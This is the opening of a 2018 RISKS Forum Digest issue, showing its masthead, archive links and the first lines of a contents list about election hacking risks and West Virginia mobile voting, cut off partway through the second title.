    RISKS List Owner

    Aug 8, 2018 5:06 PM

    Posted in group: comp.risks

    RISKS-LIST: Risks-Forum Digest Wednesday 8 August 2018 Volume 30 : Issue 79

    ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
    Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

    ***** See last item for further information, disclaimers, caveats, etc. *****
    This issue is archived at <The Risks Digest> as
    <The Risks Digest>
    The current issue can also be found at
    <http://www.csl.sri.com/users/risko/risks.txt>

    Contents:
    The Midterm Elections Are in Serious Danger of Being Hacked, Thanks to Trump
    (Mother Jones)
    West Virginia to introduce mobile phone